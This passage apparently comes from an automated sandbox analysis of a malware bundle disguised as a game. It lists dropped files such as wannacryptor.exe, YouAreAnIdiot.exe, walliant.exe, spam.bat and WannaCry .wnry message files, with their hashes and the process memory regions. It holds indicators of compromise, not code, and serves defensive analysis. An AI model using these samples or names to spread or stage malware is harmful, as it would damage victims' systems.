                                                                                                                                        383a85eab6ecda319bfddd82416fc6c2

                                                                                                                                        SHA1

                                                                                                                                        2a9324e1d02c3e41582bf5370043d8afeb02ba6f

                                                                                                                                        SHA256

                                                                                                                                        079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

                                                                                                                                        SHA512

                                                                                                                                        c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\china.png

                                                                                                                                        Filesize

                                                                                                                                        68KB

                                                                                                                                        MD5

                                                                                                                                        732dabce85a07f8c14199ab45ff7a438

                                                                                                                                        SHA1

                                                                                                                                        576d530078f6aeaf824748e7c9948930760646c4

                                                                                                                                        SHA256

                                                                                                                                        db58369e888f471c8ac8ec1580ac96003788b7bf249ab02fae6d5160a2affdc3

                                                                                                                                        SHA512

                                                                                                                                        f6963ac6f6c586ec76c00068de3145dd351f7e5b52b6733a00a46327c43a1ec34b6daa7a93cf2315cfb4a6048877bbcdc12c77b694d60f7196d75dd5ddf54e2d

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\hydra.cmd

                                                                                                                                        Filesize

                                                                                                                                        47B

                                                                                                                                        MD5

                                                                                                                                        5e578014c7017a85ca32f0b7e5d7df7f

                                                                                                                                        SHA1

                                                                                                                                        c88d8e7179fcc070d4419be9f4d8647354c2f6ed

                                                                                                                                        SHA256

                                                                                                                                        a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad

                                                                                                                                        SHA512

                                                                                                                                        7eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\msg\m_bulgarian.wnry

                                                                                                                                        Filesize

                                                                                                                                        46KB

                                                                                                                                        MD5

                                                                                                                                        95673b0f968c0f55b32204361940d184

                                                                                                                                        SHA1

                                                                                                                                        81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                                        SHA256

                                                                                                                                        40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                                        SHA512

                                                                                                                                        7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\msg\m_chinese (simplified).wnry

                                                                                                                                        Filesize

                                                                                                                                        53KB

                                                                                                                                        MD5

                                                                                                                                        0252d45ca21c8e43c9742285c48e91ad

                                                                                                                                        SHA1

                                                                                                                                        5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                                                        SHA256

                                                                                                                                        845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                                                        SHA512

                                                                                                                                        1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\msg\m_chinese (traditional).wnry

                                                                                                                                        Filesize

                                                                                                                                        77KB

                                                                                                                                        MD5

                                                                                                                                        2efc3690d67cd073a9406a25005f7cea

                                                                                                                                        SHA1

                                                                                                                                        52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                                                        SHA256

                                                                                                                                        5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                                                        SHA512

                                                                                                                                        0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\msg\m_finnish.wnry

                                                                                                                                        Filesize

                                                                                                                                        37KB

                                                                                                                                        MD5

                                                                                                                                        35c2f97eea8819b1caebd23fee732d8f

                                                                                                                                        SHA1

                                                                                                                                        e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                                        SHA256

                                                                                                                                        1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                                        SHA512

                                                                                                                                        908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\reg.reg

                                                                                                                                        Filesize

                                                                                                                                        25KB

                                                                                                                                        MD5

                                                                                                                                        aebe09cd7095ec201dc8acc350443242

                                                                                                                                        SHA1

                                                                                                                                        df7337e051bd02e1fdd4005b63ed45b8ca3d9726

                                                                                                                                        SHA256

                                                                                                                                        405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7

                                                                                                                                        SHA512

                                                                                                                                        ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\screenscrew.exe

                                                                                                                                        Filesize

                                                                                                                                        111KB

                                                                                                                                        MD5

                                                                                                                                        e87a04c270f98bb6b5677cc789d1ad1d

                                                                                                                                        SHA1

                                                                                                                                        8c14cb338e23d4a82f6310d13b36729e543ff0ca

                                                                                                                                        SHA256

                                                                                                                                        e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338

                                                                                                                                        SHA512

                                                                                                                                        8784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\spam.bat

                                                                                                                                        Filesize

                                                                                                                                        158B

                                                                                                                                        MD5

                                                                                                                                        4af4ab45205580fecf659dd857522f6b

                                                                                                                                        SHA1

                                                                                                                                        78ec5ff7647ca56d8c8d72b4da551efa86e53675

                                                                                                                                        SHA256

                                                                                                                                        b997f3a0d79493418f3e9da03dd95aea6b45b8a8c454e8e7d1f06de3ad3e1111

                                                                                                                                        SHA512

                                                                                                                                        f77c7b4d034def85c363805fe625aefb4e461770418f9015d4d5241fb8d09707b9918d54e9b2cc35d06008097174cdda0bee9702466fe7e097014794fe4d77cb

                                                                                                                                      • C:\Users\Admin\Documents\@[email protected]

                                                                                                                                        Filesize

                                                                                                                                        240KB

                                                                                                                                        MD5

                                                                                                                                        7bf2b57f2a205768755c07f238fb32cc

                                                                                                                                        SHA1

                                                                                                                                        45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                                        SHA256

                                                                                                                                        b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                                        SHA512

                                                                                                                                        91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                                      • \??\PIPE\samr

                                                                                                                                        MD5

                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                        SHA1

                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                        SHA256

                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                        SHA512

                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\YouAreAnIdiot.exe

                                                                                                                                        Filesize

                                                                                                                                        424KB

                                                                                                                                        MD5

                                                                                                                                        e263c5b306480143855655233f76dc5a

                                                                                                                                        SHA1

                                                                                                                                        e7dcd6c23c72209ee5aa0890372de1ce52045815

                                                                                                                                        SHA256

                                                                                                                                        1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

                                                                                                                                        SHA512

                                                                                                                                        e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\calc.exe

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                        MD5

                                                                                                                                        829e4805b0e12b383ee09abdc9e2dc3c

                                                                                                                                        SHA1

                                                                                                                                        5a272b7441328e09704b6d7eabdbd51b8858fde4

                                                                                                                                        SHA256

                                                                                                                                        37121ecb7c1e112b735bd21b0dfe3e526352ecb98c434c5f40e6a2a582380cdd

                                                                                                                                        SHA512

                                                                                                                                        356fe701e6788c9e4988ee5338c09170311c2013d6b72d7756b7ada5cda44114945f964668feb440d262fb1c0f9ca180549aafd532d169ceeadf435b9899c8f6

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\flasher.exe

                                                                                                                                        Filesize

                                                                                                                                        246KB

                                                                                                                                        MD5

                                                                                                                                        9254ca1da9ff8ad492ca5fa06ca181c6

                                                                                                                                        SHA1

                                                                                                                                        70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                                                                                                                                        SHA256

                                                                                                                                        30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                                                                                                                                        SHA512

                                                                                                                                        a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\jokewarehydra.exe

                                                                                                                                        Filesize

                                                                                                                                        43KB

                                                                                                                                        MD5

                                                                                                                                        b2eca909a91e1946457a0b36eaf90930

                                                                                                                                        SHA1

                                                                                                                                        3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

                                                                                                                                        SHA256

                                                                                                                                        0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

                                                                                                                                        SHA512

                                                                                                                                        607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\walliant.exe

                                                                                                                                        Filesize

                                                                                                                                        5.0MB

                                                                                                                                        MD5

                                                                                                                                        929335d847f8265c0a8648dd6d593605

                                                                                                                                        SHA1

                                                                                                                                        0ff9acf1293ed8b313628269791d09e6413fca56

                                                                                                                                        SHA256

                                                                                                                                        6613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d

                                                                                                                                        SHA512

                                                                                                                                        7c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\wannacryptor.exe

                                                                                                                                        Filesize

                                                                                                                                        3.4MB

                                                                                                                                        MD5

                                                                                                                                        84c82835a5d21bbcf75a61706d8ab549

                                                                                                                                        SHA1

                                                                                                                                        5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                                        SHA256

                                                                                                                                        ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                                        SHA512

                                                                                                                                        90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                                      • \Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\win7recovery.exe

                                                                                                                                        Filesize

                                                                                                                                        467KB

                                                                                                                                        MD5

                                                                                                                                        ab65e866abc51f841465d19aba35fb14

                                                                                                                                        SHA1

                                                                                                                                        ec79f1f511a199291b0893bc866a788ceac19f6e

                                                                                                                                        SHA256

                                                                                                                                        2ac0ca4ffda10b1861dd4ae0c2f0131a6400214cb4f5fa33951f3062b784a755

                                                                                                                                        SHA512

                                                                                                                                        2474905f174635b236e5f6e8f8c497e44435c94edd02ec47d3440c9a216f6840d040e6acc5fe2ec301ada80467f6cf55225d6361c1e7c6c6c7edccb9e7b5a35e

                                                                                                                                      • memory/404-116-0x0000000000B90000-0x0000000000C02000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        456KB

                                                                                                                                      • memory/404-120-0x0000000000440000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/628-1901-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        296KB

                                                                                                                                      • memory/628-1917-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        296KB

                                                                                                                                      • memory/628-1862-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        296KB

                                                                                                                                      • memory/628-618-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        296KB

                                                                                                                                      • memory/628-1969-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        296KB

                                                                                                                                      • memory/1128-729-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1820-619-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        656KB

                                                                                                                                      • memory/1820-1970-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        656KB

                                                                                                                                      • memory/1852-883-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.6MB

                                                                                                                                      • memory/1852-1958-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.6MB

                                                                                                                                      • memory/1916-94-0x0000000000980000-0x0000000000990000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1920-1959-0x0000000000DC0000-0x00000000010BE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                      • memory/1920-1855-0x000000006F320000-0x000000006F3A2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        520KB

                                                                                                                                      • memory/1920-1858-0x000000006FC80000-0x000000006FCA2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/1920-1859-0x0000000000DC0000-0x00000000010BE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                      • memory/1920-1856-0x000000006EEB0000-0x000000006F0CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                      • memory/1920-1857-0x000000006F150000-0x000000006F1D2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        520KB

                                                                                                                                      • memory/1920-1919-0x0000000000DC0000-0x00000000010BE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                      • memory/1920-1903-0x0000000000DC0000-0x00000000010BE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                      • memory/1920-1905-0x0000000073820000-0x000000007383C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                      • memory/1920-1906-0x000000006F5A0000-0x000000006F617000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        476KB

                                                                                                                                      • memory/1920-1908-0x000000006F150000-0x000000006F1D2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        520KB

                                                                                                                                      • memory/1920-1909-0x000000006FC80000-0x000000006FCA2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/1920-1904-0x000000006F320000-0x000000006F3A2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        520KB

                                                                                                                                      • memory/1920-1907-0x000000006EEB0000-0x000000006F0CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                      • memory/2200-104-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        864KB

                                                                                                                                      • memory/2200-882-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        864KB

                                                                                                                                      • memory/2428-1871-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        480KB

                                                                                                                                      • memory/2428-650-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        480KB

                                                                                                                                      • memory/2560-1-0x0000000001360000-0x00000000013EC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        560KB

                                                                                                                                      • memory/2560-2-0x0000000000230000-0x0000000000254000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        144KB

                                                                                                                                      • memory/2560-1873-0x0000000074280000-0x000000007496E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.9MB

                                                                                                                                      • memory/2560-3-0x0000000074280000-0x000000007496E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.9MB

                                                                                                                                      • memory/2560-56-0x000000007428E000-0x000000007428F000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2560-57-0x0000000074280000-0x000000007496E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.9MB

                                                                                                                                      • memory/2560-0-0x000000007428E000-0x000000007428F000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB